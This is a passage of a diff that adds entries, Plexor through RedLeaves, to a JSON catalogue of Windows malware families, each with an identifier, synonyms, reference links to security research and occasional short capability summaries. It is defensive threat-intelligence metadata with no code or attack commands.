"https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" + ] + }, + "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", + "value": "Plexor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", + "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" + ] + }, + "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", + "value": "Ploutus ATM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", + "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" + ] + }, + "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", + "value": "ployx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Korplug" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://community.rsa.com/thread/185439" + ] + }, + "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", + "value": "PlugX", + "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", + "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" + ] + }, + "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", + "value": "pngdowner", + "description": "" + }, + { + "meta": { + "synonyms": [ + "pivy", + "poisonivy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", + "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", + "value": "Poison Ivy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", + "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" + ] + }, + "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", + "value": "Polyglot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Siplog", + "Fareit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://github.com/nyx0/Pony" + ] + }, + "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", + "value": "Pony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", + "value": "PoohMilk Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", + "https://twitter.com/malwrhunterteam/status/806595092177965058" + ] + }, + "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", + "value": "Popcorn Time", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" + ] + }, + "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", + "value": "portless", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", + "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" + ] + }, + "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", + "value": "poscardstealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", + "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" + ] + }, + "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", + "value": "Poweliks Dropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", + "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + ] + }, + "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", + "value": "PowerDuke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", + "value": "PowerPool", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", + "https://lokalhost.pl/gozi_tree.txt" + ] + }, + "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", + "value": "Powersniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", + "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ] + }, + "uuid": "606f778a-8b99-4880-8da8-b923651d627b", + "value": "PowerRatankba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", + "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" + ] + }, + "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", + "value": "prb_backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", + "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ] + }, + "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", + "value": "Prikorma", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", + "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" + ] + }, + "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", + "value": "Prilex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", + "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", + "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" + ] + }, + "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", + "value": "PrincessLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://twitter.com/mesa_matt/status/1035211747957923840" + ] + }, + "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", + "value": "PsiX", + "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" + }, + { + "meta": { + "synonyms": [ + "PSS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", + "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" + ] + }, + "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", + "value": "PC Surveillance System", + "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + ] + }, + "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", + "value": "Pteranodon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", + "http://blog.alyac.co.kr/1853", + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" + ] + }, + "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", + "value": "PubNubRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", + "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" + ] + }, + "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", + "value": "Punkey POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", + "https://github.com/n1nj4sec/pupy", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" + ] + }, + "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", + "value": "pupy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", + "https://www.secureworks.com/research/pushdo", + "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", + "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" + ] + }, + "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", + "value": "Pushdo", + "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" + ] + }, + "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", + "value": "Putabmow", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", + "value": "PvzOut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", + "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", + "https://twitter.com/physicaldrive0/status/573109512145649664" + ] + }, + "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", + "value": "pwnpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", + "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", + "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", + "https://www.youtube.com/watch?v=HfSQlC76_s4" + ] + }, + "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", + "value": "Pykspa", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Locky Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" + ] + }, + "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", + "value": "PyLocky", + "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" + ] + }, + "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", + "value": "Qaccel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", + "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", + "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", + "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", + "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", + "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" + ] + }, + "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", + "value": "Qadars", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qbot", + "Pinkslipbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", + "http://contagiodump.blogspot.com/2010/11/template.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" + ] + }, + "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", + "value": "QakBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tolouge" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" + ] + }, + "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", + "value": "QHost", + "description": "" + }, + { + "meta": { + "synonyms": [ + "qtproject" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" + ] + }, + "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", + "value": "QtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", + "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" + ] + }, + "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", + "value": "Quant Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://github.com/quasar/QuasarRAT/tree/master/Client", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", + "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "05252643-093b-4070-b62f-d5836683a9fa", + "value": "Quasar RAT", + "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", + "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" + ] + }, + "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", + "value": "r980", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", + "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" + ] + }, + "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", + "value": "Radamant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", + "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" + ] + }, + "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", + "value": "RadRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "brebsd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", + "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" + ] + }, + "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", + "value": "Rambo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" + ] + }, + "uuid": "51f53823-d289-4176-af45-3fca7eda824b", + "value": "Ramdo", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nimnul" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", + "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", + "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "542161c0-47a4-4297-baca-5ed98386d228", + "value": "Ramnit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", + "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", + "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", + "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/" + ] + }, + "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", + "value": "Ranbyus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", + "http://blog.talosintel.com/2016/07/ranscam.html" + ] + }, + "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", + "value": "Ranscam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", + "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" + ] + }, + "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", + "value": "Ransoc", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WinLock" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", + "https://forum.malekal.com/viewtopic.php?t=36485&start=" + ] + }, + "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", + "value": "Ransomlock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", + "https://twitter.com/malwrhunterteam/status/977275481765613569", + "https://twitter.com/malwrhunterteam/status/997748495888076800" + ] + }, + "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", + "value": "Rapid Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", + "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" + ] + }, + "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", + "value": "RapidStealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", + "value": "rarstar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://blog.trex.re.kr/3" + ] + }, + "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", + "value": "RatabankaPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", + "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" + ] + }, + "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", + "value": "RawPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Remote Control System", + "Crisis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", + "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" + ] + }, + "uuid": "c359c74e-4155-4e66-a344-b56947f75119", + "value": "RCS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" + ] + }, + "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", + "value": "rdasrv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", + "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", + "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" + ] + }, + "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", + "value": "ReactorBot", + "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + ] + }, + "uuid": "826c31ca-2617-47e4-b236-205da3881182", + "value": "Reaver", + "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", + "https://www.recordedfuture.com/redalpha-cyber-campaigns/" + ] + }, + "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", + "value": "RedAlpha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", + "http://blog.macnica.net/blog/2017/12/post-8c22.html", + 